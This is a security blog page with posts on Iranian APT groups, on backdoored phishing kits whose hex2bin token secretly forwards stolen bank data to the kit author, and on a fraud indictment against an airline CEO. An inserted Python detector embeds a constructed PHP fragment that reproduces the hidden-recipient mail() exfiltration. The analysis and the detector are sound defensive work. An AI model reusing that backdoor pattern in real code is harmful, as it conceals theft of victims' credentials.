Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, the part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings at the meeting, so I want to start by sharing a link to their CISA Insights Page, where earlier this week they released some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with cyber attacks when it can't accomplish what it wants with the limited reach of its military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, which recommends its "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to the "Very Good" and "Excellent" steps as your org matures its security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) groups, and that there is much more to watching for such activity than patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT groups. Often these insights include known malware families used by the actor, or what sectors or countries the threat group has historically attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if there is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) for the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT group naming in general, is that there is a great deal of disagreement about which group names are aliases for the same groups, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

Most every vendor, it seems, likes to put their own personal spin on APT groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different animal to label each APT group based on the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?).

While there are several excellent APT Disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops ) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz Ad-Din Al Qassam - the bank DDoS guys.
  • DarkHydrus (AKA Lazy Meerkat) - some say this is actually also Slayer Kitten, others disagree.
  • Gold Lowell (AKA Boss Spider) - these are the SamSam ransomware guys.

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?

Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government-issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone updated his YouTube channel, "mr azert", with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages.")

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and Paypal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!

After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address ( and Facebook address ( jone.fredrick.79).

Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose "Spam or misleading" and then the subcategory "Scams / fraud".

In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of them.  We'll look at the Chase one first.  There are five separate PHP files that send the various stolen pieces of information back to the person using the kit.

When we look at the actual "Send" command, we notice that the email command loops with "foreach $send" ... but the instructions for the kit have told the kit downloader to put their own email address in a certain place, which is then "import"ed into this code.  So what other address is being used here?

If we scroll up a bit we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it from hex into ASCII with "hex2bin".

The calling code in this case is "myaccount.php", which seems to do some "input validation" but in reality is also loading the "token" value:

That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  and

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.
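The hex2bin "token" trick described above is easy to miss when reading a kit by eye, because the extra recipients never appear as plain text. The following Python script is an added example for kit analysts; it is not code from the post or from the kit. It embeds a constructed PHP fragment that mimics the described layout (a visible configured address plus a hex blob decoded at runtime into more recipients), with placeholder example.net/example.org addresses standing in for the real ones, and it reports every email address that appears only after decoding a long hex literal.

```python
"""Scan PHP source from a phishing kit for hex-encoded strings that hide
extra recipient addresses (the hex2bin "token" pattern described in the post).
Added example; the sample PHP and the addresses in it are constructed."""
import binascii
import re

# Constructed placeholder addresses; stand-ins for the kit author's real ones.
HIDDEN_ADDRESSES = ["kit-author@example.net", "kit-author-backup@example.org"]


def hex_encode(text: str) -> str:
    """PHP bin2hex() equivalent, used only to build the constructed sample."""
    return text.encode("utf-8").hex()


# Constructed PHP fragment modelled on the kit layout the post describes:
# $email is the address the downloader configured, $token is a hex blob that
# hex2bin() turns into additional recipients at runtime.
SAMPLE_PHP = f'''<?php
$email = $_POST['email'];           // address the kit "owner" configured
$token = "{hex_encode(",".join(HIDDEN_ADDRESSES))}";
$send = array($email);
foreach (explode(",", hex2bin($token)) as $x) {{ $send[] = $x; }}
foreach ($send as $recipient) {{
    mail($recipient, "Result", $message);
}}
'''

# A run of at least 8 hex byte pairs, not adjacent to other hex characters.
HEX_LITERAL = re.compile(r'(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){8,})(?![0-9a-fA-F])')
EMAIL = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')


def decode_hex_literals(source: str) -> list[str]:
    """Return the printable decodings of every long hex literal in the source."""
    decoded = []
    for match in HEX_LITERAL.finditer(source):
        try:
            raw = binascii.unhexlify(match.group(1))
        except binascii.Error:
            continue
        text = raw.decode("utf-8", errors="replace")
        if text.isprintable():          # keep strings, drop binary blobs
            decoded.append(text)
    return decoded


def find_hidden_recipients(source: str) -> list[str]:
    """Email addresses that exist only inside decoded hex, not in plain text."""
    visible = set(EMAIL.findall(source))
    hidden = []
    for text in decode_hex_literals(source):
        for addr in EMAIL.findall(text):
            if addr not in visible and addr not in hidden:
                hidden.append(addr)
    return hidden


if __name__ == "__main__":
    for addr in find_hidden_recipients(SAMPLE_PHP):
        print("hidden recipient:", addr)
```

Run it over every .php file unpacked from a kit; a non-empty result is the backdoor the post describes. The threshold of eight hex byte pairs keeps short colour codes and hashes-as-identifiers from producing noise, and the `isprintable()` check drops binary material such as embedded images.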

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!

Wednesday, December 04, 2019

Air Peace CEO charged with millions in money laundering re-buying planes he already owns

The Department of Justice announced last week that they were indicting the CEO of Air Peace for bank fraud and money laundering.

I had some difficulty finding the indictments for this case on PACER.  It turns out I couldn't find it in PACER because the court system decided that "Allen Ifechukwu Athan Onyema" should be listed in PACER with the last name "Athan Onyema", not "Onyema."

A friend shared a copy of the indictment from, which has had some interesting articles, such as this one:

Why we ain’t castigating Allen Onyema, by militant group

which says in part "We expect Allen Onyema to put up a good defence for himself. So far, no American bank has accused him of defrauding or absconding with its money. He is innocent until proven guilty." ... which just shows that the Joint Revolutionary Council's spokesperson also didn't read the court documents, because that is EXACTLY what he is accused of!

Onyema is well-loved by many, earning wide admiration and praise for recently using his planes to repatriate many Nigerians who found themselves facing xenophobia in South Africa, as was described in this BBC Pidgin article:
(from @flyairpeace's Instagram account)
Reading the indictment was VERY interesting.  I had previously suggested on Twitter that Onyema was buying imaginary airplanes, but that was NOT the case!  The airplanes are REAL, and various plane spotter sites list the planes with those manufacturer serial numbers as now being property of Air Peace, which boasts a growing fleet of planes, listed here:

The problem was that fake Lines of Credit, fake Appraisals, and fake Purchase documents all claimed Onyema was buying these planes from Springfield Aviation, when in fact, he had ALREADY BOUGHT THEM FROM OTHER OWNERS!  He basically bought all the planes TWICE and then bonused the money back to himself from Springfield.  He paid Springfield over $20M for the planes he already owned, and then over the course of many months, Springfield sent him back $15M of the same money.

It seems that Onyema lived for a while in Atlanta, Georgia.  In January 2016, he closed a Bank of America account and moved $4,000,396.43 via cashier's check to a pair of Wells Fargo accounts, opened in person in Atlanta, Georgia.

A LOT of money was then moved into that account, mostly from charities in Nigeria that Onyema controlled, including "All-Time Peace Media Communications" and "Foundation for Ethnic Harmony."

Onyema used the money to go shopping.  Prada, Neiman Marcus, Macy's, Louis Vuitton, the Apple store, a $180,000 Rolls Royce, an $88,500 Mercedes.  Over the course of eight years, $44.9 million was transferred from foreign accounts into Onyema's personal accounts at Bank of America, Wells Fargo, and JP Morgan Chase, mostly from the "charities" that he was running back in Africa, including Foundation for Ethnic Harmony, International Center for Non-Violence and Peace Development, All-Time Peace Media Communications Limited, and Every Child Limited.

In July 2016, Onyema opened a Wells Fargo checking account in Atlanta (WF 8621) in the name Springfield Aviation Company, LLC.  He regularly spent money from that account for personal expenses, including grocery shopping at Publix, shopping at Macy's, DSW, staying at the Ritz Carlton, and eating at various restaurants.

In November 2017, Onyema opened new bank accounts in the name of "Springfield Aviation Company, LLC" but he was the sole authorized signatory.

The stories of his double-purchased planes are told in six "Letters of Credit" scenarios in the indictment.

Letter of Credit One: FB16TLL000 for Boeing MSN: 28721

On or about February 10, 2017, Wells Fargo transferred $1,982,228.46 into Springfield Aviation's Wells Fargo account, WF 8621.  According to the court documents, however, the plane he was purchasing was already owned by Air Peace! Planespotters shows that it was registered to Air Peace (new registration: 5N-BUJ) and that the previous owner was Aurora, a Russian airline, which used the registration number RA-73013; it also notes that they stored the plane at an airport in Tallinn until 09JUN2016.

The plane, as painted by the previous owner ...

The plane, while being repainted as Air Peace (note the tail is not yet reattached)

Both of those photos were taken in Tallinn, Estonia, where the previous owner stored the plane before selling it to Air Peace.

Letter of Credit Two - LCITF-17-00414 for Boeing MSN: 27910

The court documents say the second plane was purchased by Air Peace from AerSale Inc on April 25, 2017 for $3,751,460 USD.  This is consistent with the history of that plane, which was previously sold by AerSale to Air Nigeria, and afterwards leased several times before being sold to Air Peace:

Wells Fargo received a credit request from Fidelity Bank of Nigeria saying that Air Peace was going to buy the plane for $4,750,000 from Springfield Aviation.  BUT SPRINGFIELD NEVER OWNED THE PLANE!  A company with no history of aviation, JMI LLC, provided a "full aircraft appraisal" saying the plane was worth $5,500,000 and Wells Fargo transferred $4,750,000 from Onyema's accounts into Springfield Aviation's Wells Fargo account, WF 8621, on April 25, 2017.

Letter of Credit Three - ILCCOCBG1702932 - Boeing MSN: 28561 and Boeing MSN: 28562

These two planes were bought from Texas-based Jetran, LLC on May 18, 2017.  $3,600,000 was the purchase price for the pair of planes. The wire transfer was sent from WF 8020 on May 15, 2017.

In October 2017, Wells received another letter of credit request, asking for $3,480,000 to be paid to Springfield Aviation's WF 8621 bank account.  JMI again provided an appraisal, claiming that just the 28561 plane was being sold and that it appraised by itself for $5,400,000.

On November 29, 2017, Wells Fargo transferred $4,899,690 to Springfield Aviation's Wells Fargo account WF 8621 FOR A PLANE THAT HAD ALREADY BEEN PURCHASED FROM JETRAN nine months earlier!

Letter of Credit Four - LCITF-17-00555 - Boeing MSN: 28660

In January 2017, Onyema bought another Boeing 737-300, MSN: 28660, from Oklahoma-based Aero Acquisition.  He paid $2,315,000 for the plane on January 9, 2017, wiring the money from his Wells 8020 account.

In April 2017, Wells received ANOTHER letter of credit request FOR THE SAME PLANE, but this time, claiming it would be purchased for $4,500,000 from Springfield Aviation.  On June 19, 2017, Wells Fargo transferred $4,499,900 to Springfield Aviation's Wells Fargo 8621 account, FOR A PLANE THAT SPRINGFIELD NEVER OWNED and that Onyema had already purchased from Aero Acquisition SIX MONTHS EARLIER!

None of the plane spotter photos of this plane are the Air Peace version ... but it's also a very real plane.

Letter of Credit Five - FB17ILC00561C - Boeing MSN: 28562

This is the second plane previously mentioned having been purchased in May 2017 from Jetran, LLC.  Again, a new letter of credit arrives, this time to JPMorgan Chase Bank.

On Feb 20, 2018, JPMorgan Chase transferred $4,087,028 to Springfield Aviation's JPMC 5512 bank account, FOR A PLANE THAT Onyema had already bought 9 months earlier from Jetran!

The plane was photographed with its Air Peace paint job and registration 5N-BUL in February 2018:

Many earlier photos of the same airframe exist from its time in Meridiana and Air Italy liveries.

After being paid $20,218,846 for planes it never owned, what happened next?
Springfield began sending the money back to Onyema.  All of the transfers listed below were sent from the Springfield Aviation bank accounts back to Onyema's personal accounts.
  • 3/22/2017 - $1M
  • 3/23/2017 - $1M
  • 5/7/2017 - $500,000
  • 5/7/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $100,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $150,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $890,000

After Springfield had sent $15,140,000 back to Onyema, he then tried to get the money out of the United States.  In August 2018, Onyema created Bluestream Aero Services and Springfield Aviation Company in Ontario, Canada.  He opened accounts for the companies at Bank of Montreal and sent $10 million (in November 2018) from his personal Wells Fargo account to those bank accounts in Canada.

Based on the timing of the court documents, moving $10 million out of the country is likely to be what triggered the investigation.  While the original Criminal Complaint is still "sealed", it was filed one month after the wire transfers to Canada.  So, while the indictments and arrest warrants were only issued on November 19, 2019, the court case began in December 2018 with the "magistrate complaint."

As my many Nigerian Twitter followers are reminding me, everyone is innocent until proven guilty, but what I have learned through many years of watching the American justice system is that they don't unseal federal indictments until their evidence is rock solid!  When you cause charities you control to send you $44 million dollars, and then you create fraudulent documents to pay a company you control $20 million US dollars for airplanes that you already own, and then send most of that money back to your private banking accounts, and then try to get that money out of the United States into Canada, I think it is plain to see crimes have been committed.

Of course this doesn't stop the Nigerian media from running stories describing "the allegations of financial misdeeds against [Onyema] as a deliberate attempt to kill Air Peace and deepen the unemployment crisis in the country."

I'm sure the facts won't matter to the Concerned Diaspora Citizens, but I hope reasonable people will understand that the US Government is not persecuting businessmen.  They are charging criminals with crimes.